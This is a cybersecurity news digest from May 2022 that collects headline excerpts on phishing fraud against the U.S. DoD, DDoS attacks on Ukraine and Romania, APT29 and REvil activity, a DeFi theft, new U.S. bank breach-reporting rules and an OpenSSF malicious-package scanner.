May 2, 2022

Fortify Security Team
May 2, 2022

Title: U.S. DoD Tricked into Paying $23.5 Million to Phishing Actor
Date Published: May 2, 2022

Excerpt: “The U.S. Department of Justice (DoJ) has announced the conviction of Sercan Oyuntur, 40, resident of California, for multiple counts relating to a phishing operation that caused $23.5 million in damages to the U.S. Department of Defense (DoD). The fraudster managed to divert to his personal bank account DoD funds destined for a jet fuel supplier.

Title: Group-IB CEO Remains in Prison – the Russian-Led Company has Been ‘Blacklisted’ in Italy
Date Published: May 2, 2022

Excerpt: “The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led cybersecurity company from working in the government sector, including 2 other companies – Kaspersky Labs and Positive Technologies. Originally founded in Moscow, the company landed itself into controversy after one of the Group-IB employees Nikita Kislitsin was indicted by the FBI for computer-related crimes – the selling of stolen customer data from major U.S.-based corporations. Kislitsin continues to work for Group-IB and is still currently listed on the Russian version of their official WEB-site. Later, Group-IB CEO Ilya Sachkov was arrested and detained by law enforcement and placed in prison – which has only lead to more questions.”

Title: Deep Dive: Protecting Against Container Threats in the Cloud
Date Published: May 2, 2022

Excerpt: “Containers are self-contained pods representing complete, portable application environments. They contain everything an application needs to run, including binaries, libraries, configuration files and dependencies (Docker and Amazon Elastic, for instance, are two of the more well-known offerings). Multiple containers can run on a shared infrastructure and use the same operating system kernel, but they’re abstracted from that layer and have little contact with the underlying hosting resources (which could be, for example, a public cloud instance).”

Title: Ukraine and Romania Suffer Large-Scale DDoS Attacks
Date Published: April 30, 2022

Excerpt: “The Computer Emergency Response Team of Ukraine and the National Bank of Ukraine are warning of massive DDoS attacks against pro-Ukrainian targets. The intelligence service in Romania, SRI, also warns of a similar type of attack targeting sites belonging to its national authorities. According to the CERT-UA, the unknown threat actors are targeting compromised WordPress sites and injecting malicious JavaScript code called BrownFlood to perform the attacks.”

Title: Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia
Date Published: May 2, 2022

Excerpt: “A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).”

Title: REvil ransomware returns: New Malware Sample Confirms Gang is Back
Date Published: May 1, 2022

Excerpt: “The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks. In October, the REvil ransomware gang shut down after a law enforcement operation hijacked their Tor servers, followed by arrests of members by Russian law enforcement.”

Title: Hackers Stole +80M from DeFi Platforms Rari Capital and Fei Protocol
Date Published: May  1, 2022

Excerpt: “Threat actors stole more than $80 million from the decentralized finance (DeFi) platforms Rari Capital and Fei Protocol on Saturday. Researchers from smart contract analysis firm Block Sec reported that attackers exploited a reentrancy bug in Rari’s Fuse lending protocol. Rari Capital paused borrowing globally in response to the hack and ensured that all other funds are secure.”

Title: New US Breach Reporting Rules for Banks Take Effect May 1
Date Published: April 29, 2022

Excerpt: “New cyber incident reporting rules are set to come into effect in the U.S. on May 1. Banks in the country will be required to notify regulators within the first 36 hours after an organization suffers a qualifying “computer-security incident.” The regulation was first passed in November 2021. The rule was passed by a collective of U.S. regulators, including the Federal Deposit Insurance Corp., the Board of Governors of the Federal Reserve System, and the Office of the Comptroller of the Currency.”

Title: Chinese “Override Panda” Hackers Resurface With New Espionage Attacks
Date Published: May 2, 2022

Excerpt: “A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. “The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as ‘Viper,'” Cluster25 said in a report published last week.”

Title: Open Source ‘Package Analysis’ Tool Finds Malicious npm, PyPI Packages
Date Published: May 1, 2022

Excerpt: “The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative has released its first prototype version of the ‘Package Analysis’ tool that aims to catch and counter malicious attacks on open source registries. In a pilot run that lasted less than a month, the open source project released on GitHub, was able to identify over 200 malicious npm and PyPI packages.”

Recent Posts

June 10, 2022

Title: Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store Date Published: June 9, 2022 Excerpt: “A new ransomware is taking the unusual approach of...

June 9, 2022

Title: New Symbiote Malware Infects all Running Processes on Linux Systems Date Published: June 9, 2022 Excerpt: “A newly discovered Linux malware known...

June 8, 2022

Title: Surfshark, ExpressVPN pull out of India Over Data Retention Laws Date Published: June 7, 2022 Excerpt: “Surfshark announced today they are shutting down...

June 6, 2022

Title: Italian City of Palermo Shuts Down all Systems to Fend off Cyberattack Date Published: June 6, 2022 Excerpt: “The municipality of Palermo in...

June 3, 2022

Title: Critical Atlassian Confluence Zero-Day Actively Used in Attack Date Published: June 2, 2022 Excerpt: “Hackers are actively exploiting a new Atlassian...

June 2, 2022

Title: Conti Ransomware Targeted Intel Firmware for Stealthy Attacks Date Published: June 2, 2022 Excerpt: “Researchers analyzing the leaked chats of the...

June 1, 2022

Title: Ransomware Attacks Need Less Than Four Days to Encrypt Systems Date Published: June 1, 2022 Excerpt: “The duration of ransomware attacks in 2021...